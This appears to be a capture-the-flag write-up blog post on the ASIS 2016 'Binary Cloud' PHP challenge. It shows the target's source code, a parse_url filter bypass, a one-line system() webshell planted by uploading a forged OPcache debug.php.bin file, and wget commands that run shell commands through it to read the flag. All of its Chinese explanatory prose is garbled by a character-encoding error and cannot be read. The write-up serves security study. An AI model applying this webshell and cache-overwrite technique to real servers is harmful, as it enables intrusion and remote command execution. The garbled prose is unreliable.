LoRexxar's Blog

Asis2016_Binary Cloud

2016/05/10

涓婂懆鐨刟sis2016姣旇禌涓紝鏈変釜寰堢壒鍒殑棰樼洰鍙獴inary Cloud锛岃実etshell鐨勬柟娉曟槸鍓嶆鏃堕棿鐨勬墠鐖嗗嚭鏉ョ殑Binary Webshell Through OPcache in PHP 7锛屽湪瀹炴垬鐜涓瘮杈冩湁瓒(锝烇浚鈻斤浚)锝

棰樼洰瀹為檯娌″仛鍑烘潵褰撴椂锛屽悗鏉ョ湅浜哻tftime鐨剋p
http://corb3nik.github.io/asis%202016/Binary-Cloud/

鏀堕泦淇℃伅

棣栧厛鍙戠幇瀛樺湪

1
2
3
4
5
User-Agent: *
Disallow: /
Disallow: /debug.php
Disallow: /cache
Disallow: /uploads

鎵撳紑鐪嬪埌/uploads鍜/cache浼氱垎forbidden,鍦╠ebug椤甸潰鎴戜滑鍙戠幇浜phpinfo()
鎴戜滑鍙互鐪嬪埌php鐗堟湰鏄php7.0.4

鏍规嵁涓婇潰寰楀埌鐨勪俊鎭紝鎴戜滑鐚滄祴OPcache鏄鍏佽鐨勶紝鑰孫Pcache瀵瑰簲鐨勪綅缃氨鏄痳obots.txt涓婂搴旂殑/cache

1
opcache.file_cache=/home/binarycloud/www/cache

鍐嶇炕缈荤湅绔欏唴鍙戠幇瀛樺湪鏂囦欢涓婁紶鍜屾枃浠跺寘鍚紝鐢氳嚦鍙互閫氳繃鏂囦欢鍖呭惈鏉ヨ鍙栨枃浠剁殑婧愮爜
http://binarycloud.asis-ctf.ir?page=php://filter/convert.base64-encode/resource=upload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
<?php
function ew($haystack, $needle) {
return $needle === "" || (($temp = strlen($haystack) - strlen($needle)) &gt;= 0 &amp;&amp; strpos($haystack, $needle, $temp) !== false);
}
function filter_directory(){
$data = parse_url($_SERVER['REQUEST_URI']);
$filter = ["cache", "binarycloud"];
foreach($filter as $f){
if(preg_match("/".$f."/i", $data['query'])){
die("Attack Detected");
}
}
}
function error($msg){
die("&lt;script&gt;alert('$msg');history.go(-1);&lt;/script&gt;");
}
filter_directory();
if($_SERVER['QUERY_STRING'] &amp;&amp; $_FILES['file']['name']){
if(!file_exists($_SERVER['QUERY_STRING'])) error("error3");
$name = preg_replace("/[^a-zA-Z0-9\.]/", "", basename($_FILES['file']['name']));
if(ew($name, ".php")) error("error");
$filename = $_SERVER['QUERY_STRING'] . "/" . $name;
if(file_exists($filename)) error("exists");
if (move_uploaded_file($_FILES['file']['tmp_name'], $filename)){
die("uploaded at &lt;a href=$filename&gt;$filename&lt;/a&gt;&lt;hr&gt;&lt;a href='javascript:history.go(-1);'&gt;Back&lt;/a&gt;");
}else{
error("error");
}
}
?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
<?php
define("__INTERNAL__", "TRUE");
if(debug_backtrace()) goto pitfall;
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="">
<meta name="author" content="">
<title>BinaryCloud &mdash; Upload your files, except PHP scripts!</title>
<link href="//netdna.bootstrapcdn.com/bootstrap/3.0.3/css/bootstrap.min.css" rel="stylesheet">
</head>
<body>
<header class="navbar navbar-default navbar-fixed-top" role="banner">
<div class="header container">
<div class="navbar-header">
<button class="navbar-toggle" type="button" data-toggle="collapse" data-target=".navbar-collapse">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href="/" class="navbar-brand">BinaryCloud</a>
</div>
<nav class="collapse navbar-collapse" role="navigation">
<ul class="nav navbar-nav">
<li><a href="?page=upload">Upload</a></li>
</ul>
</nav>
</div>
</header>
<div style="margin-bottom:30px;"></div>
<div class="container">
<?php
$filter = ["compress.zlib", "glob", "data", "http", "ftp", "phar"];
foreach($filter as $f){
stream_wrapper_unregister($f);
}
if(!$_GET) $_GET = Array("page" => NULL);
$page = ($_GET['page'] ? $_GET['page'] : "home");
@include($page . ".php");
?>
</div>
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js" type='text/javascript'></script>
</body>
</html>
<?php
pitfall:
?>

浠旂粏闃呰涓嬫簮鐮侊紝鍙互鐨勫埌涓浜涗俊鎭
1銆侀鍏堟垜浠彂鐜版垜浠棤娉曚笂浼.php鏂囦欢锛屽湪鍖呭惈鏃朵細鑷姩琛ヤ笂.php
2銆佹垜浠笉鑳藉寘鍚甫鏈塩ache鎴栬卋inaryload鐨勯摼鎺
3銆佹垜浠笂浼犵殑鏂囦欢鍚嶅瓧浼氱粡杩噋reg_replace()鍜宐asename()

缁撳悎鍓嶉潰鐨勪俊鎭垜浠兂鍒颁簡鎴戜滑鍙互閫氳繃娉ㄥ叆.php.bin杩欐牱鐨勬柟寮廹etshell锛屼篃灏辨槸鍓嶉潰鎻愬埌鐨Binary Webshell Through OPcache in PHP 7

bypass鐩綍杩囨护

鍦╱pload.php鎴戜滑鐪嬪埌

1
2
3
4
5
6
7
8
9
function filter_directory(){
$data = parse_url($_SERVER['REQUEST_URI']);
$filter = ["cache", "binarycloud"];
foreach($filter as $f){
if(preg_match("/".$f."/i", $data['query'])){
die("Attack Detected");
}
}
}

鍙戠幇涓涓壒娈婄殑鏄parse_url($_SERVER['REQUEST_URI'])
杩欓噷涔熸槸娌¤杩囩殑榛戠鎶
鑰佸鏄繖涔堣鐨
This function can be bypassed though, as parse_url takes a URL as a parameter. It does not deal well with URIs.
閫氳繃parse_url鑾峰彇URL鐨勫弬鏁版湁涓鐐瑰効闂锛屼粬骞朵笉鑳藉緢濂界殑澶勭悊锛屽鏋滄垜浠紶鍏ョ殑鏄
///upload.php?cache杩欐牱鐨勫湴鍧锛岀劧鍚巔arse_url()澶勭悊URL浼氳繑鍥瀎alse锛岄偅涔堝悗闈㈢殑preg_match灏变笉浼氬尮閰嶅埌浠讳綍瀛楃涓蹭簡銆

閫氳繃Binary Webshell Through OPcache in PHP 7 getshell

棣栧厛鍘熺悊鎴戜滑闇瑕佸厛浜嗚В涓涓
http://blog.gosecure.ca/2016/04/27/binary-webshell-through-opcache-in-php-7/
wooyun鏈夌炕璇戠殑鏂囩珷
http://drops.wooyun.org/web/15450

鑰岀幇鍦ㄦ垜浠殑鐩爣鏄氳繃閲嶅啓debug.php銆乽pload.php銆乮ndex.php鐨勭紦瀛樸

棣栧厛鎴戜滑闇瑕佺敓鎴愪竴涓猟ebug.php.bin锛屽氨鏄笅闈㈣繖涓枃浠剁殑缂栬瘧鐗

1
2
3
<?php
system($_GET['cmd']);
?>

鏍规嵁鏂囩珷鎴戜滑杩橀渶瑕佽绠楀嚭system_id
杩欎釜涓嶉敊鐨勮剼鏈槸
https://github.com/GoSecure/php7-opcache-override

1
2
3
4
5
6
7
$ ./system_id_scraper.py https://binarycloud.asis-ctf.ir/debug.php
PHP version : 7.0.4-7ubuntu2
Zend Extension ID : API320151012,NTS
Zend Bin ID : BIN_SIZEOF_CHAR48888
Assuming x86_64 architecture
------------
System ID : 81d80d78c6ef96b89afaadc7ffc5d7ea

闇瑕佽窇涓涓phpinfo()鐨勯〉闈

鐒跺悗鎴戜滑鍦ㄦ湰鍦扮敓鎴愭伓鎰忕殑debug.php.bin鏂囦欢锛岄鍏堟槸鐢ㄥ崄鍏繘鍒剁紪杈戝櫒淇敼鏂囦欢寮澶寸殑systemid锛屼笂浼
闇瑕佹敞鎰忕殑鏄痙ebug.php.bin鐨勮矾寰

1
[cache location][system id][document root][debug.php.bin]

鍦ㄨ繖閲岀殑棰樼洰灏辨槸

1
cache/81d80d78c6ef96b89afaadc7ffc5d7ea/home/banarycloud/www

涔嬪悗鎴戜滑璁块棶https://binarycloud.asis-ctf.ir/debug.php灏辨槸鎴戜滑鐨剋ebshell浜

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
wget -qO- https://binarycloud.asis-ctf.ir/debug.php?cmd="ls /"
WH4T_1S_7H3_FL4G
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib64
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old

1
2
$ wget -qO- https://binarycloud.asis-ctf.ir/debug.php?cmd="cat /WH4T_1S_7H3_FL4G"
ASIS{5e00f204374f9ce481acc97294eda1f0}
CATALOG
  1. 1. 鏀堕泦淇℃伅
  2. 2. bypass鐩綍杩囨护
  3. 3. 閫氳繃Binary Webshell Through OPcache in PHP 7 getshell